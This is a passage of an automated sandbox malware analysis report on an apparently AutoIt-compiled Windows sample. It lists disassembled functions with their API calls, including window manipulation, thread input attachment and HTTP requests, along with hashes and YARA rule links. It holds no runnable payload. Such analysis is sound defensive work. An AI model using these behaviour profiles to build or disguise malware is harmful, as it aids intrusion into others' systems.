                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                            • API String ID: 4194297153-14809454
                                                                                                            • Opcode ID: 12c313aa49164c4c00ee92791fb2155e24e80b77d8bf502cea106b11a24ad4bc
                                                                                                            • Instruction ID: 27b75c66efd9feb9e30cdde1960b383220ec431eb7fcd0f7b61b34ae2ac2874c
                                                                                                            • Opcode Fuzzy Hash: 12c313aa49164c4c00ee92791fb2155e24e80b77d8bf502cea106b11a24ad4bc
                                                                                                            • Instruction Fuzzy Hash: 2C31B335A046059FCB15DF68D885FA97BB4EB45305F188059E801DB256DB30EDC6CBB0
                                                                                                            Function 00DE3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateMenu.USER32 ref: 00DE3C79
                                                                                                            • SetMenu.USER32(?,00000000), ref: 00DE3C88
                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DE3D10
                                                                                                            • IsMenu.USER32(?), ref: 00DE3D24
                                                                                                            • CreatePopupMenu.USER32 ref: 00DE3D2E
                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DE3D5B
                                                                                                            • DrawMenuBar.USER32 ref: 00DE3D63
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                            • String ID: 0$F
                                                                                                            • API String ID: 161812096-3044882817
                                                                                                            • Opcode ID: ded177b6ccc5f1c74057b795389d2af2b66afa77a663457a72b6ff34d21b8686
                                                                                                            • Instruction ID: f6c00e42977a44833abf4e7dcb9cb3176dbc6892b65dd27130d2c46bf450f6a8
                                                                                                            • Opcode Fuzzy Hash: ded177b6ccc5f1c74057b795389d2af2b66afa77a663457a72b6ff34d21b8686
                                                                                                            • Instruction Fuzzy Hash: 55416D75A01349EFDB14EF65D888AAA77B5FF49350F180028F946AB360D730AA11CFA0
                                                                                                            Function 00DB1EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00DB1F64
                                                                                                            • GetDlgCtrlID.USER32 ref: 00DB1F6F
                                                                                                            • GetParent.USER32 ref: 00DB1F8B
                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DB1F8E
                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00DB1F97
                                                                                                            • GetParent.USER32(?), ref: 00DB1FAB
                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DB1FAE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 711023334-1403004172
                                                                                                            • Opcode ID: 88658db8afbf9816765f13c33e50c91df757ff8e7a1585b97a91253daf42c204
                                                                                                            • Instruction ID: 710f2f19b80bfb5abfa1130795cab207b0b7b631f01d89b97a651b43ce19b8b2
                                                                                                            • Opcode Fuzzy Hash: 88658db8afbf9816765f13c33e50c91df757ff8e7a1585b97a91253daf42c204
                                                                                                            • Instruction Fuzzy Hash: DF21BE75900214FBCF04AFA0CC95DFEBBB9EF19310B501519BD66A72A1CB349919DB70
                                                                                                            Function 00DE3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DE3A9D
                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DE3AA0
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00DE3AC7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DE3AEA
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DE3B62
                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00DE3BAC
                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00DE3BC7
                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00DE3BE2
                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00DE3BF6
                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00DE3C13
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 312131281-0
                                                                                                            • Opcode ID: 3fec922e5cb8fb01e9ea008da3324c5bb1701e05acf5d8de7dc352904cb45b43
                                                                                                            • Instruction ID: 197570893de2e392ad1c9db449fbb97fa596ee448f17f6b09c91df6cc65e869c
                                                                                                            • Opcode Fuzzy Hash: 3fec922e5cb8fb01e9ea008da3324c5bb1701e05acf5d8de7dc352904cb45b43
                                                                                                            • Instruction Fuzzy Hash: DA617D75900248AFDB10EF68CC85EFE77B8EB49700F140199FA15A72A1C770AE45DB60
                                                                                                            Function 00DBB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00DBB151
                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB165
                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00DBB16C
                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB17B
                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DBB18D
                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB1A6
                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB1B8
                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB1FD
                                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB212
                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB21D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                            • String ID:
                                                                                                            • API String ID: 2156557900-0
                                                                                                            • Opcode ID: 1ea8a697dbca493ae1efc9a9048ff4d9a5106fd854ea8a5877078adc82c6ec6e
                                                                                                            • Instruction ID: 25b19f0c72518d15fe9d250ffb2df7c76909af2698466b90df3fd3e4adcadf39
                                                                                                            • Opcode Fuzzy Hash: 1ea8a697dbca493ae1efc9a9048ff4d9a5106fd854ea8a5877078adc82c6ec6e
                                                                                                            • Instruction Fuzzy Hash: FB318271610304EFDB20AF25DC84FAE7B6ABB51361F14500AF912EA250D7F49D468F74
                                                                                                            Function 00D82C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00D82C94
                                                                                                              • Part of subcall function 00D829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
                                                                                                              • Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0
                                                                                                            • _free.LIBCMT ref: 00D82CA0
                                                                                                            • _free.LIBCMT ref: 00D82CAB
                                                                                                            • _free.LIBCMT ref: 00D82CB6
                                                                                                            • _free.LIBCMT ref: 00D82CC1
                                                                                                            • _free.LIBCMT ref: 00D82CCC
                                                                                                            • _free.LIBCMT ref: 00D82CD7
                                                                                                            • _free.LIBCMT ref: 00D82CE2
                                                                                                            • _free.LIBCMT ref: 00D82CED
                                                                                                            • _free.LIBCMT ref: 00D82CFB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 1f61f02d19df9127bdc48699408e8489c461c019d57733f565008cdb65a7cc9c
                                                                                                            • Instruction ID: fd8c2c17b9dad9346c04f91351f0b77e3ca99e739b2039a3d8e16b596e49d414
                                                                                                            • Opcode Fuzzy Hash: 1f61f02d19df9127bdc48699408e8489c461c019d57733f565008cdb65a7cc9c
                                                                                                            • Instruction Fuzzy Hash: 84115076540108BFCB02FF54D982CAD3BA5FF05350F5245A5FA489B222DB35EA509FB0
                                                                                                            Function 00D51410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D51459
                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00D514F8
                                                                                                            • UnregisterHotKey.USER32(?), ref: 00D516DD
                                                                                                            • DestroyWindow.USER32(?), ref: 00D924B9
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00D9251E
                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D9254B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                            • String ID: close all
                                                                                                            • API String ID: 469580280-3243417748
                                                                                                            • Opcode ID: b60c67159f72e0420f7c5e3f3a5a736850c66e783eae59eb529df2a539b8068e
                                                                                                            • Instruction ID: a81d00fdd1493b127bfca5ddf951257a96b469c464144a9fe811c98ef1b0071c
                                                                                                            • Opcode Fuzzy Hash: b60c67159f72e0420f7c5e3f3a5a736850c66e783eae59eb529df2a539b8068e
                                                                                                            • Instruction Fuzzy Hash: C1D136356012129FCF29EF15C899B29F7A4FF05701F1542ADE84AAB252DB31AD1ACF70
                                                                                                            Function 00DC7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DC7FAD
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC7FC1
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00DC7FEB
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00DC8005
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8017
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8060
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DC80B0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 769691225-438819550
                                                                                                            • Opcode ID: 973fd1e62eefee4fc82b2e0fc52cdd5f9800e8c07f171515f8e62f4fe086ca7d
                                                                                                            • Instruction ID: 78decca34f5cfd9719ef8b892d6fca578bf47f8a0b8b7fc8bd6ccfa2c99f757b
                                                                                                            • Opcode Fuzzy Hash: 973fd1e62eefee4fc82b2e0fc52cdd5f9800e8c07f171515f8e62f4fe086ca7d
                                                                                                            • Instruction Fuzzy Hash: D9817D725083429BCB20EF54C884EAAB3E8BF89351F18485EF885D7250EB34DD499F72
                                                                                                            Function 00D55BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00D55C7A
                                                                                                              • Part of subcall function 00D55D0A: GetClientRect.USER32(?,?), ref: 00D55D30
                                                                                                              • Part of subcall function 00D55D0A: GetWindowRect.USER32(?,?), ref: 00D55D71
                                                                                                              • Part of subcall function 00D55D0A: ScreenToClient.USER32(?,?), ref: 00D55D99
                                                                                                            • GetDC.USER32 ref: 00D946F5
                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D94708
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00D94716
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00D9472B
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00D94733
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D947C4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                            • String ID: U
                                                                                                            • API String ID: 4009187628-3372436214
                                                                                                            • Opcode ID: 5c46690813b0a7e2560abec8b48fb91f50dfc4eb204f4cbda916d6a095915cb6
                                                                                                            • Instruction ID: f74afb027ce6c041e396f68eb13afcfaf32bfbb95c89fc7a87d789ef131bee6a
                                                                                                            • Opcode Fuzzy Hash: 5c46690813b0a7e2560abec8b48fb91f50dfc4eb204f4cbda916d6a095915cb6
                                                                                                            • Instruction Fuzzy Hash: 6671BE31400209DFCF229FA4C984EBA3BB5FF4A365F184269ED555A26AC7319846DFB0
                                                                                                            Function 00DC359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DC35E4
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • LoadStringW.USER32(00E22390,?,00000FFF,?), ref: 00DC360A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LoadString$_wcslen
                                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                            • API String ID: 4099089115-2391861430
                                                                                                            • Opcode ID: 5004f2189b0b9b63fb8cb61eece12d5d4246531623054dc29c3846bedae5974d
                                                                                                            • Instruction ID: a447885207d3bded968827e05434e62270cd5f1fac1b23cb621eb709b40bbea4
                                                                                                            • Opcode Fuzzy Hash: 5004f2189b0b9b63fb8cb61eece12d5d4246531623054dc29c3846bedae5974d
                                                                                                            • Instruction Fuzzy Hash: 82517D7280024ABADF14EBA0CC52EEDBB75EF14341F144169F915721A1EB306B99DF70
                                                                                                            Function 00DCC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DCC272
                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DCC29A
                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DCC2CA
                                                                                                            • GetLastError.KERNEL32 ref: 00DCC322
                                                                                                            • SetEvent.KERNEL32(?), ref: 00DCC336
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00DCC341
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                            • Opcode ID: 71e63d03290dc009d799f004605fd17172a3db87c2777fd6e7e84eb22035c4a7
                                                                                                            • Instruction ID: 1381f4fc9e6156122ee47723e8b8e9740ffd142171feb496c9496784ef4e6b4a
                                                                                                            • Opcode Fuzzy Hash: 71e63d03290dc009d799f004605fd17172a3db87c2777fd6e7e84eb22035c4a7
                                                                                                            • Instruction Fuzzy Hash: 62319CB1520749AFD721AF649888FAB7AFCEB49740B08951EF58AD7210DB30DD058B70
                                                                                                            Function 00DB989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D93AAF,?,?,Bad directive syntax error,00DECC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00DB98BC
                                                                                                            • LoadStringW.USER32(00000000,?,00D93AAF,?), ref: 00DB98C3
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00DB9987
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                            • API String ID: 858772685-4153970271
                                                                                                            • Opcode ID: 887f0ba40892ae3baff2bd2c66715246db6f0d51b576d30546efd3d4d216ed85
                                                                                                            • Instruction ID: 091f38bff71a78849a6fd891298b4ba4d7cbd9b53a3efeffc9b307d48c57b905
                                                                                                            • Opcode Fuzzy Hash: 887f0ba40892ae3baff2bd2c66715246db6f0d51b576d30546efd3d4d216ed85
                                                                                                            • Instruction Fuzzy Hash: D0216B3290035EEBDF11AF90CC56EEEB735FF18301F045469FA25660A2EA719A58CB30
                                                                                                            Function 00DB209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetParent.USER32 ref: 00DB20AB
                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00DB20C0
                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00DB214D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameParentSend
                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                            • API String ID: 1290815626-3381328864
